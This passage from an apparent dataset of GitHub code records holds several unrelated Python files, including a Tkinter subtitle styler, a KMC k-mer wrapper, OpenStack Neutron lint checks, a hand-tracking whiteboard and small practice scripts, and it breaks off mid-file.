e:messages(19))\nalignment_entry = tk.Entry(root, textvariable=Alignment)\nalignment_entry.place(x=348.5, y=270, width=89.5)\n\n\n# margin left label and entry\n\nmarginl_label = ttk.Label(root, text='MarginL:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nmarginl_label.place(x=20, y=300)\nmarginl_label.bind('', lambda e:messages(20))\nmarginl_entry = tk.Entry(root, textvariable=MarginL)\nmarginl_entry.place(x=20, y=320, width=89.5)\n\n\n# margin right label and entry\n\nmarginr_label = ttk.Label(root, text='MarginR:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nmarginr_label.place(x=129.5, y=300)\nmarginr_label.bind('', lambda e:messages(21))\nmarginr_entry = tk.Entry(root, textvariable=MarginR)\nmarginr_entry.place(x=129.5, y=320, width=89.5)\n\n\n# margin vector label and entry\n\nmarginv_label = ttk.Label(root, text='MarginV:', foreground=text_color, font=('Ariel', 10), 
cursor='hand2')\nmarginv_label.place(x=239, y=300)\nmarginv_label.bind('', lambda e:messages(22))\nmarginv_entry = tk.Entry(root, textvariable=MarginV)\nmarginv_entry.place(x=239, y=320, width=89.5)\n\n\n# Encoding label and entry\n\nencoding_label = ttk.Label(root, text='Encoding:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nencoding_label.place(x=348, y=300)\nencoding_label.bind('', lambda e:messages(23))\nencoding_entry = tk.Entry(root, textvariable=Encoding)\nencoding_entry.place(x=348, y=320, width=89.5)\n\nentry_list = [name_entry, fontname_entry, fontsize_entry, primarycolor_entry, secondarycolor_entry, outlinecolor_entry,\n backcolor_entry, bold_entry, italic_entry, underline_entry, strikeout_entry, scalex_entry, scaley_entry,\n spacing_entry, angel_entry, borderstyle_entry, outline_entry, shadow_entry, alignment_entry,\n marginl_entry, marginr_entry, marginv_entry, encoding_entry]\n\n\n# set as default checkbox\n\nsetdefault_checkbox = tk.Checkbutton(root, text='Set setting as Default', fg=text_color, font=('Ariel', 10),\n variable=setasdefault)\nsetdefault_checkbox.place(x=20, y=345)\n\n\n# Convert from .srt to .ass checkbox\n\nsrt2ass_checkbox = tk.Checkbutton(root, text='Convert .srt file to .ass', fg=text_color, font=('Ariel', 10), variable=srt2ass)\nsrt2ass_checkbox.place(x=20, y=370)\n\n\n# clear all fields button\n\nclearsetting_btn = tk.Button(root, text='Clear all fields', foreground='red', font=('Ariel', 11, 'bold'),\n command=lambda: clear_fields(entry_list))\nclearsetting_btn.place(x=323, y=350)\n\n\n# load defaults button\n\nbtn_state = check_json()\nloaddefaults_btn = tk.Button(root, text='Load Defaults', foreground=text_color, font=('Ariel', 11, 'bold'),\n state=btn_state, command=lambda: load_defaults())\nloaddefaults_btn.place(x=190, y=350)\n\n\n# line seperator\n\nseperator = ttk.Separator(root, orient='horizontal')\nseperator.place(x=20, y=395, width=418)\n\n\n# text area\n\nfileslist_label = ttk.Label(root, text='Selected files:', foreground=text_color, font=('Ariel', 11, 'bold'))\nfileslist_label.place(x=240, y=400)\nfiles_listbox = tk.Listbox(root)\nfiles_listbox.place(x=150, y=420, width=288, height=170)\n\n\n# choose files button\n\nchoosefiles_button = tk.Button(root, text='Choose Files', foreground=text_color, font=('Ariel', 12, 'bold'),\\\n command=lambda: choose_files())\nchoosefiles_button.place(x=20, y=400, width=120)\n\n\n# clear files button\n\nclearfiles_btn = tk.Button(root, text='Clear Selected', foreground=text_color, font=('Ariel', 12, 'bold'),\\\n command=lambda: clear_selected())\nclearfiles_btn.place(x=20, y=450, width=120)\n\n\n# submit changes to files button\n\nsubmit_btn = tk.Button(root, text='Submit', foreground=text_color, font=('Ariel', 12, 'bold'),\n command=lambda: submit(setasdefault, srt2ass))\nsubmit_btn.place(x=20, y=500, width=120)\n\n# line seperator\n\nseperator = ttk.Separator(root, orient='horizontal')\nseperator.place(x=20, y=540, width=120)\n\n\n\n# exit button\n\nexit_btn = tk.Button(root, text='Exit', foreground=text_color, font=('Ariel', 12, 'bold'), command=root.quit)\nexit_btn.place(x=20, y=550, width=120)\n\n\nroot.mainloop()\n\n","repo_name":"Ddady1/Subtitler","sub_path":"Subtitler.py","file_name":"Subtitler.py","file_ext":"py","file_size_in_byte":26242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6821104558","text":"numbersTaken = [2, 5, 12, 33, 17]\n\nprint('here are the numbers still available')\n\nfor n in range (1, 20): # 1 t0 
19\n    if n in numbersTaken:\n        continue # skip the print below\n    print(n)\n\n    ","repo_name":"murchie85/Python-Basics","sub_path":"Continue.py","file_name":"Continue.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
{"seq_id":"28494843577","text":"from typing import List\n\nclass Solution:\n    def arrayNesting(self, nums: List[int]) -> int:\n        visited = set()\n        def dfs(node):\n            if node in visited:\n                return 0\n            visited.add(node)\n            return dfs(nums[node]) + 1\n        ans = 0\n        for i in range(len(nums)):\n            ans = max(ans, dfs(i))\n        return ans\n    ","repo_name":"fasil729/Comptetive-Programming-A2SV","sub_path":"0565-array-nesting/0565-array-nesting.py","file_name":"0565-array-nesting.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
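Because nums in the array-nesting record above is a permutation of 0..n-1, every index lies on exactly one cycle, which is why marking visited nodes makes the solution O(n). An equivalent iterative sketch (function name is mine) that avoids Python's recursion limit on long cycles:

def array_nesting(nums):
    visited = [False] * len(nums)
    best = 0
    for start in range(len(nums)):
        i, length = start, 0
        while not visited[i]:
            visited[i] = True
            i = nums[i]  # follow the permutation cycle
            length += 1
        best = max(best, length)
    return best

assert array_nesting([5, 4, 0, 3, 1, 6, 2]) == 4  # LeetCode 565 sample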
{"seq_id":"39956683410","text":"from glob import glob\nimport os\nimport re\nfrom sys import stderr\nimport Tabular\n\ndef err(s):\n\tstderr.write(s)\n\ndef runKMC(options, gids):\n\tdList = glob(options.kmcDir + '/*')\n\tfor i in dList:\n\t\tos.remove(i)\n\n\tfList = []\n\tfor i in gids:\n\t\tfList.append(i + '.fasta')\n\n\terr(\"Running KMC...\\n\\t\")\n\tcnt = 0\n\tinc = len(fList) / 50.\n\tfor i in fList:\n\t\tif cnt >= inc:\n\t\t\terr('=')\n\t\t\tcnt = 0\n\t\tcnt += 1\n\n\t\tfName = options.fastaDir + i\n\n\t\tcmdArr = []\n\t\tif options.pairedEnd:\n\t\t\tcmdArr = ['kmc.sh', str(options.kmerSize), '@' + fName, options.kmcDir + i, options.kmcDir, \"> /dev/null\"]\n\t\telse:\n\t\t\tcmdArr = ['kmc.sh', str(options.kmerSize), fName, options.kmcDir + i, options.kmcDir, \"> /dev/null\"]\n\t\tcmd = ' '.join(cmdArr)\n\n\t\tos.system(cmd)\n\t\tos.system('rm ' + str(options.kmcDir) + i + '.kmc_pre')\n\t\tos.system('rm ' + str(options.kmcDir) + i + '.kmc_suf')\n\terr(\"\\n\")\n\ndef readKMCOut(fName, options):\n\tf = open(fName)\n\n\tkmerHsh = {}\n\tfor i in f:\n\t\ti = i.strip().split('\\t')\n\t\tif options.presence_absence:\n\t\t\tkmerHsh[i[0]] = 1\n\t\telse:\n\t\t\tkmerHsh[i[0]] = int(i[1])\n\n\tf.close()\n\n\treturn kmerHsh\n\ndef readKMC(options):\n\tfList = glob(options.kmcDir + '*.' + str(options.kmerSize) + '.kmrs')\n\n\tkmerHsh = {}\n\tcount = 0\n\tinc = len(fList) / 50\n\tstderr.write(\"Reading KMC files...\\n\\t\")\n\tfor i in fList:\n\t\tif count > inc:\n\t\t\tstderr.write('=')\n\t\t\tcount = 0\n\t\tcount += 1\n\n\t\tgid = re.sub(r'\\.fasta\\.[0-9]*\\.kmrs', '', os.path.basename(i))\n\t\tkmerHsh[gid] = readKMCOut(i, options)\n\tstderr.write('\\n')\n\n\treturn kmerHsh\n\ndef mergeFastasAndRunKMC(options):\n\tgids = Tabular.getGIDs(options)\n\n\tcmd = '>' + str(options.tempDir + 'allFasta.fasta')\n\terr(\"merging all KMC...\\n\\t\")\n\tcnt = 0\n\tinc = len(gids) / 50.\n\tfor i in gids:\n\t\tif cnt >= inc:\n\t\t\terr('=')\n\t\t\tcnt = 0\n\t\tcnt += 1\n\n\t\tif os.path.isfile(str(options.fastaDir) + i + '.fasta'):\n\t\t\t# cmdArr.append(str(options.fastaDir) + i + '.fasta')\n\t\t\tcmdArr = ['cat', str(options.fastaDir) + i + '.fasta', '>> ' + str(options.tempDir + 'allFasta.fasta')]\n\t\t\tcmd = ' '.join(cmdArr)\n\t\t\tos.system(cmd)\n\terr('\\n')\n\n\t# cmdArr = ['cat', str(options.fastaDir) + '*.fasta > ' + str(options.tempDir + 'allFasta.fasta')]\n\t# cmd = ' '.join(cmdArr)\n\t# os.system(cmd)\n\n\tif not options.pairedEnd:\n\t\tcmdArr = ['kmc.sh', str(options.kmerSize), options.tempDir + 'allFasta.fasta', options.tempDir + 'allFasta.fasta', options.tempDir]\n\telse:\n\t\tcmdArr = ['kmc.sh', str(options.kmerSize), '@' + options.tempDir + 'allFasta.fasta', options.tempDir + 'allFasta.fasta', options.tempDir]\n\tcmd = ' '.join(cmdArr)\n\tos.system(cmd)\n\n\tcmdArr = ['rm', options.tempDir + 'allFasta.fasta']\n\tcmd = ' '.join(cmdArr)\n\tos.system(cmd)\n\ndef getAllFeats(options):\n\tallFeats = {}\n\n\tf = open(options.tempDir + 'allFasta.fasta.' + str(options.kmerSize) + '.kmrs')\n\n\tfor i in f:\n\t\ti = i.strip().split('\\t')\n\t\tif len(i) != 2:\n\t\t\tcontinue\n\n\t\tif i[0] not in allFeats:\n\t\t\tallFeats[i[0]] = 0\n\n\tf.close()\n\n\tcount = 0\n\tfor i in sorted(allFeats):\n\t\tallFeats[i] = count\n\t\tcount += 1\n\n\treturn allFeats\n\ndef normalizeByTot(kmerHsh):\n\ttot = 0\n\n\tfor i in kmerHsh:\n\t\ttot += kmerHsh[i]\n\n\ttot = float(tot)\n\n\tfor i in kmerHsh:\n\t\tkmerHsh[i] /= tot\n\ndef normalizeByMarkov(kmerHsh):\n\tsubHsh = {}\n\n\tfor i in kmerHsh:\n\t\tsub = i[:len(i)/2]\n\t\tif sub not in subHsh:\n\t\t\tsubHsh[sub] = 0\n\t\tsubHsh[sub] += kmerHsh[i]\n\n\t\tsub = i[len(i)/2:]\n\t\tif sub not in subHsh:\n\t\t\tsubHsh[sub] = 0\n\t\tsubHsh[sub] += kmerHsh[i]\n\n\tfor i in subHsh:\n\t\tsubHsh[i] = float(subHsh[i])\n\n\tfor i in kmerHsh:\n\t\tsub = i[:len(i)/2]\n\t\tkmerHsh[i] /= subHsh[sub]\n\ndef normalizeKMC(kmerHsh, options):\n\tif options.normalize == 0:\n\t\treturn\n\telif options.normalize == 1:\n\t\tnormalizeByTot(kmerHsh)\n\t\treturn\n\telif options.normalize == 2:\n\t\tnormalizeByMarkov(kmerHsh)\n\t\treturn\n\telse:\n\t\tstderr.write(\"Invalid -r | --normalize_kmer option. Valid values { 0 1 2 }.\\n\")\n\t\texit(1)\n\n\n","repo_name":"Tinyman392/GenomicModelCreator","sub_path":"KMC.py","file_name":"KMC.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"}
{"seq_id":"8671720031","text":"import os\nimport re\n\nfrom hacking import core\n\n\n# Guidelines for writing new hacking checks\n#\n# - Use only for Neutron specific tests. OpenStack general tests\n#   should be submitted to the common 'hacking' module.\n# - Pick numbers in the range N3xx. 
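A tiny sanity check for normalizeByMarkov in the KMC record above, after its final lookup is corrected to subHsh[sub] (indexing with the full k-mer i raises KeyError, since subHsh is keyed by half-length substrings). Toy counts are mine, and // replaces the record's Python-2 integer division:

kmers = {'ACGT': 4, 'ACGG': 6}  # both share the first half 'AC'
sub = {}
for k in kmers:
    for half in (k[:len(k) // 2], k[len(k) // 2:]):
        sub[half] = sub.get(half, 0) + kmers[k]
assert sub == {'AC': 10, 'GT': 4, 'GG': 6}
# each k-mer count is normalised by the count of its first half
normalised = {k: kmers[k] / sub[k[:len(k) // 2]] for k in kmers}
assert normalised == {'ACGT': 0.4, 'ACGG': 0.6}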
Find the current test with\n# the highest allocated number and then pick the next value.\n# - Keep the test method code in the source file ordered based\n# on the N3xx value.\n# - List the new rule in the top level HACKING.rst file\n# - Add test cases for each new rule to\n# neutron/tests/unit/hacking/test_checks.py\n\n\nfilter_match = re.compile(r\".*filter\\(lambda \")\n\ntests_imports_dot = re.compile(r\"\\bimport[\\s]+neutron.tests\\b\")\ntests_imports_from1 = re.compile(r\"\\bfrom[\\s]+neutron.tests\\b\")\ntests_imports_from2 = re.compile(r\"\\bfrom[\\s]+neutron[\\s]+import[\\s]+tests\\b\")\n\nimport_mock = re.compile(r\"\\bimport[\\s]+mock\\b\")\nimport_from_mock = re.compile(r\"\\bfrom[\\s]+mock[\\s]+import\\b\")\nimport_six = re.compile(r\"\\bimport[\\s]+six\\b\")\nimport_from_six = re.compile(r\"\\bfrom[\\s]+six[\\s]+import\\b\")\n\n\n@core.flake8ext\ndef check_assert_called_once_with(logical_line, filename):\n \"\"\"N322 - Try to detect unintended calls of nonexistent mock methods like:\n assertCalledOnceWith\n assert_has_called\n called_once_with\n \"\"\"\n if 'neutron/tests/' in filename:\n if '.assert_called_once_with(' in logical_line:\n return\n uncased_line = logical_line.lower().replace('_', '')\n\n check_calls = ['.assertcalledoncewith', '.calledoncewith']\n if any(x for x in check_calls if x in uncased_line):\n msg = (\"N322: Possible use of no-op mock method. \"\n \"please use assert_called_once_with.\")\n yield (0, msg)\n\n if '.asserthascalled' in uncased_line:\n msg = (\"N322: Possible use of no-op mock method. \"\n \"please use assert_has_calls.\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_asserttruefalse(logical_line, filename):\n \"\"\"N328 - Don't use assertEqual(True/False, observed).\"\"\"\n if 'neutron/tests/' in filename:\n if re.search(r\"assertEqual\\(\\s*True,[^,]*(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertTrue(observed) instead of \"\n \"assertEqual(True, observed)\")\n yield (0, msg)\n if re.search(r\"assertEqual\\([^,]*,\\s*True(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertTrue(observed) instead of \"\n \"assertEqual(True, observed)\")\n yield (0, msg)\n if re.search(r\"assertEqual\\(\\s*False,[^,]*(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertFalse(observed) instead of \"\n \"assertEqual(False, observed)\")\n yield (0, msg)\n if re.search(r\"assertEqual\\([^,]*,\\s*False(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertFalse(observed) instead of \"\n \"assertEqual(False, observed)\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertitemsequal(logical_line, filename):\n \"\"\"N329 - Don't use assertItemsEqual.\"\"\"\n if 'neutron/tests/' in filename:\n if re.search(r\"assertItemsEqual[\\(,]\", logical_line):\n msg = (\"N329: Use assertCountEqual() instead of \"\n \"assertItemsEqual()\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertempty(logical_line, filename):\n \"\"\"N330 - Enforce using assertEqual parameter ordering in case of empty\n objects.\n \"\"\"\n if 'neutron/tests/' in filename:\n msg = (\"N330: Use assertEqual(*empty*, observed) instead of \"\n \"assertEqual(observed, *empty*). 
*empty* contains \"\n \"{}, [], (), set(), '', \\\"\\\"\")\n empties = r\"(\\[\\s*\\]|\\{\\s*\\}|\\(\\s*\\)|set\\(\\s*\\)|'\\s*'|\\\"\\s*\\\")\"\n reg = r\"assertEqual\\(([^,]*,\\s*)+?%s\\)\\s*$\" % empties\n if re.search(reg, logical_line):\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertisinstance(logical_line, filename):\n \"\"\"N331 - Enforce using assertIsInstance.\"\"\"\n if 'neutron/tests/' in filename:\n if re.search(r\"assertTrue\\(\\s*isinstance\\(\\s*[^,]*,\\s*[^,]*\\)\\)\",\n logical_line):\n msg = (\"N331: Use assertIsInstance(observed, type) instead \"\n \"of assertTrue(isinstance(observed, type))\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertequal_for_httpcode(logical_line, filename):\n \"\"\"N332 - Enforce correct ordering for httpcode in assertEqual.\"\"\"\n msg = (\"N332: Use assertEqual(expected_http_code, observed_http_code) \"\n \"instead of assertEqual(observed_http_code, expected_http_code)\")\n if 'neutron/tests/' in filename:\n if re.search(r\"assertEqual\\(\\s*[^,]*,[^,]*HTTP[^\\.]*\\.code\\s*\\)\",\n logical_line):\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_oslo_i18n_wrapper(logical_line, filename, noqa):\n \"\"\"N340 - Check for neutron.i18n usage.\"\"\"\n\n if noqa:\n return\n\n split_line = logical_line.split()\n modulename = os.path.normpath(filename).split('/')[0]\n bad_i18n_module = '%s.i18n' % modulename\n\n if (len(split_line) > 1 and split_line[0] in ('import', 'from')):\n if (split_line[1] == bad_i18n_module or\n modulename != 'neutron' and split_line[1] in\n ('neutron.i18n', 'neutron._i18n')):\n msg = (\"N340: %(found)s is found. Use %(module)s._i18n instead.\"\n % {'found': split_line[1], 'module': modulename})\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_builtins_gettext(logical_line, tokens, filename, lines, noqa):\n \"\"\"N341 - Check usage of builtins gettext _().\"\"\"\n\n if noqa:\n return\n\n modulename = os.path.normpath(filename).split('/')[0]\n\n if '%s/tests' % modulename in filename:\n return\n\n if os.path.basename(filename) in ('i18n.py', '_i18n.py'):\n return\n\n token_values = [t[1] for t in tokens]\n i18n_wrapper = '%s._i18n' % modulename\n\n if '_' in token_values:\n i18n_import_line_found = False\n for line in lines:\n split_line = [elm.rstrip(',') for elm in line.split()]\n if (len(split_line) > 1 and split_line[0] == 'from' and\n split_line[1] == i18n_wrapper and\n '_' in split_line):\n i18n_import_line_found = True\n break\n if not i18n_import_line_found:\n msg = (\"N341: _ from python builtins module is used. 
\"\n \"Use _ from %s instead.\" % i18n_wrapper)\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_no_imports_from_tests(logical_line, filename, noqa):\n \"\"\"N343 - Production code must not import from neutron.tests.*\n \"\"\"\n msg = (\"N343: Production code must not import from neutron.tests.*\")\n\n if noqa:\n return\n\n if 'neutron/tests/' in filename:\n return\n\n for regex in tests_imports_dot, tests_imports_from1, tests_imports_from2:\n if re.match(regex, logical_line):\n yield(0, msg)\n\n\n@core.flake8ext\ndef check_python3_no_filter(logical_line):\n \"\"\"N344 - Use list comprehension instead of filter(lambda).\"\"\"\n\n msg = (\"N344: Use list comprehension instead of \"\n \"filter(lambda obj: test(obj), data) on python3.\")\n\n if filter_match.match(logical_line):\n yield(0, msg)\n\n\n# TODO(boden): rehome this check to neutron-lib\n@core.flake8ext\ndef check_no_sqlalchemy_event_import(logical_line, filename, noqa):\n \"\"\"N346 - Use neutron_lib.db.api.sqla_listen rather than sqlalchemy.\"\"\"\n if noqa:\n return\n is_import = (logical_line.startswith('import') or\n logical_line.startswith('from'))\n if not is_import:\n return\n for kw in ('sqlalchemy', 'event'):\n if kw not in logical_line:\n return\n yield (0, \"N346: Register sqlalchemy events through \"\n \"neutron_lib.db.api.sqla_listen so they can be cleaned up \"\n \"between unit tests\")\n\n\n@core.flake8ext\ndef check_no_import_mock(logical_line, filename, noqa):\n \"\"\"N347 - Test code must not import mock library\n \"\"\"\n msg = (\"N347: Test code must not import mock library\")\n\n if noqa:\n return\n\n if 'neutron/tests/' not in filename:\n return\n\n for regex in import_mock, import_from_mock:\n if re.match(regex, logical_line):\n yield(0, msg)\n\n\n@core.flake8ext\ndef check_no_import_six(logical_line, filename, noqa):\n \"\"\"N348 - Test code must not import six library\n \"\"\"\n msg = \"N348: Test code must not import six library\"\n\n if noqa:\n return\n\n for regex in import_six, import_from_six:\n if re.match(regex, logical_line):\n yield(0, msg)\n","repo_name":"openstack/neutron","sub_path":"neutron/hacking/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"29705445858","text":"import cv2\nfrom mediapipe.framework.formats.landmark_pb2 import LandmarkList\nimport numpy as np\nimport os\nimport HandTrack_Module as HT\n#######################\nbrushThickness = 15\neraserThickness = 100\n########################\n\n\nfolderPath = \"header\"\nmyList = os.listdir(folderPath)\nprint(myList)\n\n\nheaderList = []\nfor imPath in myList:\n image = cv2.imread(f'{folderPath}/{imPath}')\n headerList.append(image)\nprint(len(headerList))\nheader = headerList[0]\n\ndrawColor = (255, 0, 255)\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\n\ndetector = HT.handDetect(detectConf=0.75,maxHands=1)\nxp, yp = 0, 0\nimgCanvas = np.zeros((720, 1280, 3), np.uint8)\n\nwhile True:\n\n # 1. Import image\n success, img = cap.read()\n img = cv2.flip(img, 1)\n\n # 2. Find Hand Landmarks\n img = detector.lookForHands(img)\n lmList = detector.lookForPosition(img, draw=False)\n\n if len(lmList) != 0:\n\n # print(lmList)\n\n # tip of index and middle fingers\n x1, y1 = lmList[8][1:]\n x2, y2 = lmList[12][1:]\n\n # 3. Check which fingers are up\n fingers = detector.lookForFinger()\n # print(fingers)\n\n # 4. 
If Selection Mode - Two finger are up\n if fingers[1] and fingers[2]:\n # xp, yp = 0, 0\n #print(\"Selection Mode\")\n #cracking my head open yes thankyou\n if(y1 < 125):\n if(x1 >= 200 and x1 <= (200+100)):\n #print(\"select color : red\")\n Header = headerList[0]\n drawColor = (52, 64, 235)\n elif(x1 >= 350 and x1 <= (350+100)):\n # print(\"Select Colour : yellow\")\n Header = headerList[1]\n drawColor = (11,195,255)\n elif(x1 >= 500 and x1 <= (500 + 100)):\n #print(\"select color : blue\")\n Header = headerList[2]\n drawColor=(235, 64, 52)\n elif(x1 >= 1000 and x1 <=(1000+100)):\n #print(\"erase\")\n activeHeader = headerList[3]\n drawColor = (0,0,0)\n cv2.rectangle(img, (x1, y1 - 25), (x2, y2 + 25), drawColor, cv2.FILLED)\n\n # 5. If Drawing Mode - Index finger is up\n if fingers[1] and fingers[2] == False:\n cv2.circle(img, (x1, y1), 15, drawColor, cv2.FILLED)\n #print(\"Drawing Mode\")\n if xp == 0 and yp == 0:\n xp, yp = x1, y1\n\n cv2.line(img, (xp, yp), (x1, y1), drawColor, brushThickness)\n cv2.line(imgCanvas,(xp,yp), (x1,y1), drawColor,brushThickness)\n\n if drawColor == (0, 0, 0):\n cv2.line(img, (xp, yp), (x1, y1), drawColor, eraserThickness)\n cv2.line(imgCanvas, (xp, yp), (x1, y1), drawColor, eraserThickness)\n #\n else:\n cv2.line(img, (xp, yp), (x1, y1), drawColor, brushThickness)\n cv2.line(imgCanvas, (xp, yp), (x1, y1), drawColor, brushThickness)\n\n xp, yp = x1, y1\n\n\n # # Clear Canvas when all fingers are up\n #if all (x >= 1 for x in fingers):\n #imgCanvas = np.zeros((720, 1280, 3), np.uint8)\n\n imgGray = cv2.cvtColor(imgCanvas, cv2.COLOR_BGR2GRAY)\n _, imgInv = cv2.threshold(imgGray, 50, 255, cv2.THRESH_BINARY_INV)\n imgInv = cv2.cvtColor(imgInv,cv2.COLOR_GRAY2BGR)\n img = cv2.bitwise_and(img,imgInv)\n img = cv2.bitwise_or(img,imgCanvas)\n\n\n # Setting the header image\n img[0:125, 0:1280] = header\n # img = cv2.addWeighted(img,0.5,imgCanvas,0.5,0)\n cv2.imshow(\"Image\", img)\n #cv2.imshow(\"Canvas\", imgCanvas)\n #cv2.imshow(\"Inv\", imgInv)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncv2.destroyAllWindows()","repo_name":"RichardWibowo/AI-Whiteboard","sub_path":"WhiteBoard_Module.py","file_name":"WhiteBoard_Module.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40452203170","text":"import os\nfrom celery.bin import worker\nfrom argparse import ArgumentParser\nfrom nesta.tasks.tasks import get_worker\nfrom nesta.tasks.notice import get_notice\nfrom nesta.configs.util import parse_env, parse_config\nfrom nesta.external.daemon import Daemon\nfrom celery.bin.celeryd_detach import detached_celeryd\n\n\ndef parse_arguments():\n parser = ArgumentParser()\n parser.add_argument(\"--name\", dest=\"name\", type=str,\n help=\"worker name(worker, notice)\", required=True)\n return parser.parse_args()\n\n\nclass Worker(Daemon):\n def __init__(self, name, configs):\n assert isinstance(configs, dict)\n conf = configs[\"services\"].get(name)\n if conf is None:\n raise ValueError(\n \"Config does not defined for service: {}\".format(name))\n\n logfile = conf[\"logfile\"]\n super().__init__(\n pidfile=conf[\"pidfile\"],\n stdout=logfile,\n stderr=logfile\n )\n\n app = None\n if name == \"worker\":\n app = get_worker(**configs)\n elif name == \"notice\":\n app = get_notice(**configs)\n else:\n raise ValueError(\"Unknown worker name: {}\".format(name))\n self._worker = worker.worker(app=app)\n \n self._config = {\n \"logfile\": conf[\"logfile\"],\n \"loglevel\": 
conf[\"loglevel\"],\n \"traceback\": True,\n }\n\n def _run(self):\n self._worker.run(**self._config)\n\n\nif __name__ == \"__main__\":\n env_dict = parse_env()\n configs = parse_config(env_dict[\"MODE\"])\n\n options = parse_arguments()\n\n w = Worker(options.name, configs=configs)\n w.start()","repo_name":"phaesoo/nesta","sub_path":"nesta/worker/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24739138355","text":"from random import randint\n\nguessed = False\nrnd = randint(1, 10)\nprint(\"Zgaduj zgadula!!!\")\nwhile True:\n try:\n while not guessed:\n str_num = input(\"Podaj liczbę 1 - 10:\")\n num = int(str_num)\n if num > 10 or num < 1:\n print(\"Liczby w przedziale 1 - 10.\")\n elif num == rnd:\n print(\"Brawo!\")\n guessed = True\n else:\n print(\"Pudło!\")\n except ValueError:\n print(\"To nie jest liczba!\"\n \"Spróbuj ponownie.\")\n","repo_name":"kamilnowak05/nauka","sub_path":"Python podstawy/1_Zadania/Dzien_3/6_Wyjątki/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36017522964","text":"from builtins import range\nimport mwparserfromhell as mwp\nfrom .error import Error\n\n\nclass MWParserModError(Error):\n pass\n\n\nclass NotWikicodeError(MWParserModError):\n pass\n\n\ndef parse(wikitext):\n wikicode = mwp.parse(wikitext, skip_style_tags=True)\n _split_wikicode_on_endlines(wikicode)\n return wikicode\n\n\ndef seperate_wikicode_nodes_on_newlines(wikicode):\n if type(wikicode) is not mwp.wikicode.Wikicode:\n raise NotWikicodeError(type(wikicode))\n _split_wikicode_on_endlines(wikicode)\n\n\ndef _split_wikicode_on_endlines(wikicode):\n divided = []\n cur = []\n for node in wikicode.nodes:\n if type(node) is mwp.nodes.text.Text:\n split_nodes = _split_text_node_on_endline(node)\n if len(split_nodes) > 1:\n wikicode.replace(node, split_nodes[0])\n for i in range(1, len(split_nodes)):\n wikicode.insert_after(split_nodes[i - 1], split_nodes[i])\n\n\ndef _split_text_node_on_endline(text_node):\n text = text_node.value\n lines = _split_text_and_leave_delimiter(text, \"\\n\")\n results = []\n for line in lines:\n if line != \"\":\n results.append(mwp.nodes.text.Text(line))\n return results\n\n\ndef _split_text_and_leave_delimiter(text, delimiter):\n result = []\n lines = text.split(delimiter)\n for i, line in enumerate(lines):\n if i == (len(lines) - 1):\n break\n result.append(line + delimiter)\n result.append(lines[i])\n return result\n","repo_name":"amyxzhang/wikum","sub_path":"wikum/wikichatter/mwparsermod.py","file_name":"mwparsermod.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"72"} +{"seq_id":"14923976739","text":"# -*- coding: utf8 -*-\n\nimport sys\nimport util.path\nimport util.zip_package as zip\n\npath = util.path.path\n\ndef pack_skin():\n print('pack_skin')\n zip.zip_folder(str(path['CoreRoot'] / 'DuiLib' / 'Resources'), str(path['ResultCore'] / 'skin.zip'), zip.FileNameRegexNegtiveFilter('thumbs\\.db'))\n\ndef Configuration():\n if len(sys.argv) > 1:\n return sys.argv[1]\n return 'Debug'\n\nif __name__ == '__main__':\n util.path.ResetPath(Configuration())\n 
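# packs DuiLib/Resources into ResultCore/skin.zip, skipping thumbs.db via the negative filename filter above\n    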
pack_skin()\n","repo_name":"yatyricky/XYWE","sub_path":"Build/Python/pack_skin.py","file_name":"pack_skin.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33194682696","text":"\"\"\" create an instruction function for when the user does not know how to play,\n connecting codes\n Katelyn Gee\n 05/04/2022\"\"\"\n\n\n# yes/no checker function goes here:\ndef yes_no(asking):\n while True:\n # Ask user if they have played the game in the past\n question = input(asking).lower()\n\n # If yes, calling on game function\n if question == \"y\" or question == \"yes\":\n question = \"Yes\"\n return question\n\n # If no, calling on instruction function\n elif question == \"n\" or question == \"no\":\n question = \"No\"\n return question\n\n # If incorrect input, repeat questions\n else:\n print(\"Incorrect input, please enter yes or no (y/n).\")\n return question\n\n\n# function to display instructions\ndef instructions():\n print(\"*** How to play ***\")\n print()\n print(\"The game rules will go here\")\n print()\n print(\"Program continues\")\n\n\n# main routine goes here:\nplayed_before = yes_no(\"Do you know how to play this game (Lucky Unicorn)? Y/N \")\n\nif played_before == \"No\":\n instructions()\nelse:\n print(\"Program 